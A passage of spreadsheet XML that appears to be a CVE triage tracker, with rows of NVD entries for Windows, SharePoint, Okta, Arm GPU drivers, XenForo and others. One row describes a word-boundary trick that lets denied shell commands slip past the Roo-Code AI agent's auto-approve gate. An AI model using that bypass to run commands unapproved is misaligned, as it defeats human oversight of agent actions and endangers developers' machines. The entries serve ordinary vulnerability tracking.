    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="D695" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F695" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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5" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S695" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="D696" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F696" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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6" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S696" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D697" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F697" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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97" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S697" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D698" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F698" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S698" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="D699" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F699" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K69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99" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S699" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D700" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F700" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K70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00" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S700" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85983</t>
        </is>
      </c>
      <c r="D701" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F701" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S701" s="5" t="inlineStr">
        <is>
          <t>The Auth0 AD/LDAP Connector improperly processes a configuration value during service startup. This allows a low-privileged user on the host system to modify the connector's configuration. When the service restarts, the modified configuration can lead to code execution with the privileges of the service account.</t>
        </is>
      </c>
      <c r="T701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9034</t>
        </is>
      </c>
      <c r="D702" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F702" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S702" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.
This issue affects Bifrost GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p3; Valhall GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="T702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19397</t>
        </is>
      </c>
      <c r="D703" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F703" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S703" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for a critical function in ASUS Control Center Express Agent allows an unauthenticated nearby user to control the host via a direct connection to the agent when the host has an active login session.
Refer to the ' 
Security Update for ASUS Control Center Express Agent ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="D704" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F704" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S704" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="D705" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K705" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S705" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73315</t>
        </is>
      </c>
      <c r="D706" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F706" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S706" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t>
        </is>
      </c>
      <c r="T706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77909</t>
        </is>
      </c>
      <c r="D707" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F707" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S707" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="D708" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F708" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S708" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize SAML assertion values before interpolating them into database queries in the advanced mode datastore configuration. The unsanitized values are substituted directly into the query string prior to preparation, resulting in unintended SQL execution against the configured backend database.</t>
        </is>
      </c>
      <c r="T708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82537</t>
        </is>
      </c>
      <c r="D709" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F709" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="S709" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability that allows attackers to execute denied shell commands by exploiting a word-boundary mismatch in comment handling between the approval gate's shell parser and bash. Attackers can craft a command string with an allowlisted word immediately followed by a hash character, separator, and denied command to pass the approval gate while bash executes the denied command with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="T709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9040</t>
        </is>
      </c>
      <c r="D710" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F710" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S710" s="5" t="inlineStr">
        <is>
          <t>A race condition vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to cause a denial of service or disclose sensitive information.
This issue affects Bifrost GPU Kernel Driver: from r12p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r19p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="T710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77110</t>
        </is>
      </c>
      <c r="D711" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F711" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
